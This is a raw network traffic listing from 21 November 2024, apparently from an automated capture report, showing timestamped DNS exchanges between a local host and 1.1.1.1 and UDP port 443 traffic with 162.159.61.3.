                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:50.607620001 CET53496851.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:50.612916946 CET53646731.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:51.384736061 CET6249153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:51.521653891 CET53624911.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:52.529969931 CET6253753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:52.530227900 CET6525853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:52.530817032 CET5564353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:52.530930042 CET5846153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:52.670985937 CET53625371.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:52.671003103 CET53556431.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:52.671098948 CET53584611.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:52.672946930 CET53652581.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:55.396536112 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:55.711136103 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:56.320415020 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:56.530664921 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:56.530679941 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:56.530689955 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:56.530695915 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:56.533121109 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:56.535867929 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:56.539155006 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:56.646274090 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:56.859833002 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:56.859994888 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:56.860003948 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:56.860013008 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:56.861140966 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:56.861186028 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:56.865117073 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:56.865921974 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:56.866004944 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:56.867005110 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:57.184626102 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:57.211062908 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:01.569169998 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:01.569396973 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:01.893433094 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:01.895030022 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:01.897376060 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:01.899406910 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:07.486726999 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:07.486821890 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:07.486999989 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:07.487159967 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:07.811280012 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:07.812757015 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:07.812901020 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:07.813173056 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:07.813797951 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:07.822972059 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:07.823183060 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:07.919032097 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:07.919186115 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:07.938241959 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:07.938323975 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:08.243386030 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:08.244448900 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:08.244878054 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:08.245045900 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:08.263058901 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:08.265345097 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:08.265608072 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:08.271364927 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:08.947881937 CET5153953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:09.084690094 CET53515391.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:09.670593023 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:09.670816898 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:09.995209932 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:09.996721983 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:10.000088930 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:10.000421047 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:10.824744940 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:10.825036049 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:11.148966074 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:11.154201984 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:11.154211998 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:11.154445887 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:11.380884886 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:11.380951881 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:11.706016064 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:11.706185102 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:11.709158897 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:11.709906101 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:11.710561991 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:14.358328104 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:14.358411074 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:14.358540058 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:14.358592987 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:14.358671904 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:14.358773947 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:14.358808041 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:14.358982086 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:14.363178015 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:14.363254070 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:14.565484047 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:14.578134060 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:14.686114073 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:14.689986944 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:14.690079927 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:14.690737963 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:14.692188025 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:14.692270994 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:14.692280054 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:14.692380905 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:14.692390919 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:14.692400932 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:14.692563057 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:14.692665100 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:14.692866087 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:14.692945957 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:14.693044901 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:14.693125010 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:14.761943102 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:14.765662909 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:14.890256882 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:14.891146898 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:14.902295113 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:14.906598091 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:14.906858921 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:15.086303949 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:15.089695930 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:15.091341972 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:15.093523979 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:15.093734026 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:15.093997955 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:15.094300985 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:15.094724894 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:15.125869036 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:15.125976086 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:15.421168089 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:15.450176001 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:15.450562954 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:15.452450037 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:15.452591896 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:15.452855110 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:16.798624992 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:16.798825026 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:16.798986912 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:16.798986912 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:16.799042940 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:16.799098015 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:16.803436995 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:16.803534985 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:17.123485088 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:17.124543905 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:17.124866009 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:17.124965906 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:17.125195980 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:17.125287056 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:17.125354052 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:17.125364065 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:17.125806093 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:17.125991106 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:17.128000021 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:17.129458904 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:17.129873991 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:17.130006075 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:17.364448071 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:17.364559889 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:17.689820051 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:17.690164089 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:17.691123009 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:17.691426039 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:19.407452106 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:19.407588005 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:19.408128977 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:19.408252001 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:19.408608913 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:19.408777952 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:19.733954906 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:19.735255957 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:19.735975027 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:19.736232996 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:19.736505985 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:19.736521959 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:19.736532927 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:19.736541986 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:19.736736059 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:19.737050056 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:25.604600906 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:25.604731083 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:25.627604961 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:25.627737045 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:25.633533001 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:25.633666992 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:25.929312944 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:25.932069063 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:25.933789968 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:25.934236050 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:25.953773022 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:25.954849958 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:25.955502033 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:25.955707073 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:25.957446098 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:25.961337090 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:25.966048956 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:25.966276884 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:26.257221937 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:26.299237967 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:30.019907951 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:30.020086050 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:30.344804049 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:30.347817898 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:30.349724054 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:30.350199938 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:47.230005026 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:47.230170012 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:47.554718971 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:47.556647062 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:47.557918072 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:47.560435057 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:52.132061005 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:52.132061005 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:52.456813097 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:52.459101915 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:52.459222078 CET44353940162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:52.459364891 CET53940443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:01.344800949 CET51672443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:01.346088886 CET51672443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:01.346088886 CET51672443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:01.346347094 CET51672443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:02.368844986 CET51672443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:02.368908882 CET51672443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:02.369199991 CET5828753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:02.369461060 CET6427053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:02.369610071 CET51672443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:02.369643927 CET51672443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:02.369740009 CET51672443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:02.531507969 CET44351672162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:02.531997919 CET51672443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:02.571360111 CET51672443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:02.702238083 CET44351672162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:02.702287912 CET44351672162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:02.702347994 CET44351672162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:02.702394962 CET44351672162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:02.702423096 CET44351672162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:02.702503920 CET44351672162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:02.702781916 CET51672443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:02.702914953 CET51672443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:02.703226089 CET51672443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:02.712074995 CET51672443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:02.864845991 CET44351672162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:02.899669886 CET51672443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:03.035748005 CET44351672162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:03.035784960 CET44351672162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:03.044579029 CET44351672162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:03.071304083 CET51672443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:04.639079094 CET53507191.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:35.462435007 CET53566551.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:49.823499918 CET60928443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:49.823689938 CET60928443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:49.823966980 CET60928443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:49.823966980 CET60928443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:50.837642908 CET60928443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:50.837718010 CET60928443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:50.838041067 CET6309653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:50.838315010 CET5080553192.168.2.51.1.1.1
